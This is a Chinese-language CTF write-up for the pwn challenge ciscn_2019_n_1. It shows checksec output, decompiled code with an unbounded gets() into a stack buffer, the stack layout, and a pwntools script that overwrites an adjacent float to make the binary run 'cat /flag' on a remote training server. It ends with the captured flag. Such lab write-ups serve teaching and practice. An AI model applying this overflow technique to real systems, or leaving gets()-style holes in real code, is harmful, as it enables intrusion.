• ciscn_2019_n_1

    1. checksec ciscn_2019_n_1

    Arch: amd64-64-little
    RELRO: Partial RELRO
    Stack: No canary found
    NX: NX enabled
    PIE: No PIE (0x400000)

    1. 用IDA64打开,找到main()直接F5反编译,有
    int __cdecl main(int argc, const char **argv, const char **envp)
{
  setvbuf(_bss_start, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 2, 0LL);
  func();
  return 0;
}
    1. 所以问题的关键,在func(),查看该函数有
    int func()
{
  int result; // eax
  char v1; // [rsp+0h] [rbp-30h]
  float v2; // [rsp+2Ch] [rbp-4h]

  v2 = 0.0;
  puts("Let's guess the number.");
  gets(&v1);
  if ( v2 == 11.28125 )
    result = system("cat /flag");
  else
    result = puts("Its value should be 11.28125");
  return result;
}
    1. 因此基本逻辑是:getsv1,如果v2等于11.28125则可得到flag。双击v1查看栈信息,有

    -0000000000000030 ; D/A/* : change type (data/ascii/array)
    -0000000000000030 ; N : rename
    -0000000000000030 ; U : undefine
    -0000000000000030 ; Use data definition commands to create local variables and function arguments.
    -0000000000000030 ; Two special fields " r" and " s" represent return address and saved registers.
    -0000000000000030 ; Frame size: 30; Saved regs: 8; Purge: 0
    -0000000000000030 ;
    -0000000000000030
    -0000000000000030 var_30 db ?
    -000000000000002F db ? ; undefined
    -000000000000002E db ? ; undefined
    -000000000000002D db ? ; undefined
    -000000000000002C db ? ; undefined
    -000000000000002B db ? ; undefined
    -000000000000002A db ? ; undefined
    -0000000000000029 db ? ; undefined
    -0000000000000028 db ? ; undefined
    -0000000000000027 db ? ; undefined
    -0000000000000026 db ? ; undefined
    -0000000000000025 db ? ; undefined
    -0000000000000024 db ? ; undefined
    -0000000000000023 db ? ; undefined
    -0000000000000022 db ? ; undefined
    -0000000000000021 db ? ; undefined
    -0000000000000020 db ? ; undefined
    -000000000000001F db ? ; undefined
    -000000000000001E db ? ; undefined
    -000000000000001D db ? ; undefined
    -000000000000001C db ? ; undefined
    -000000000000001B db ? ; undefined
    -000000000000001A db ? ; undefined
    -0000000000000019 db ? ; undefined
    -0000000000000018 db ? ; undefined
    -0000000000000017 db ? ; undefined
    -0000000000000016 db ? ; undefined
    -0000000000000015 db ? ; undefined
    -0000000000000014 db ? ; undefined
    -0000000000000013 db ? ; undefined
    -0000000000000012 db ? ; undefined
    -0000000000000011 db ? ; undefined
    -0000000000000010 db ? ; undefined
    -000000000000000F db ? ; undefined
    -000000000000000E db ? ; undefined
    -000000000000000D db ? ; undefined
    -000000000000000C db ? ; undefined
    -000000000000000B db ? ; undefined
    -000000000000000A db ? ; undefined
    -0000000000000009 db ? ; undefined
    -0000000000000008 db ? ; undefined
    -0000000000000007 db ? ; undefined
    -0000000000000006 db ? ; undefined
    -0000000000000005 db ? ; undefined
    -0000000000000004 var_4 dd ?
    +0000000000000000 s db 8 dup(?)
    +0000000000000008 r db 8 dup(?)
    +0000000000000010
    +0000000000000010 ; end of stack variables

    同时可知

    因此gets时先覆盖'a'*(0x30-0x04)即可到v2的部分,再跟上11.28125的十六进制数即可成功获取flag。如何直接获取11.28125的16进制:在func()的文本界面gets之后找到一行比较浮点数的代码,将光标停留在其上,即可看到数值0x41348000

    1. 获取方法如下
    from pwn import *

p = remote('node3.buuoj.cn', 28521)
payload = 'a'*(0x30-0x04) + p32(0x41348000)

p.sendline(payload)
p.interactive()

    flag{be5ed9d3-9121-4c5e-85fa-d9c37a1f4bf9}
  • 相关阅读:
    QT实现软件重启
    Qt 延时
    gcc 创建库及使用
    verilog 奇数分频设计
    内核中的 likely() 与 unlikely()
    TFT LCD 参数详解
    手动安装m4, autoconf, automake, libtool
    [其他] 蒙特卡洛(Monte Carlo)模拟手把手教基于EXCEL与Crystal Ball的蒙特卡洛成本模拟过程实例:
    Origin9.1如何绘制风向玫瑰图(Binned Data)?
    Origin9.1如何使用原始数据(Raw Data)绘制风向玫瑰图
  • 原文地址:https://www.cnblogs.com/vict0r/p/13786557.html
Copyright © 2020-2023  润新知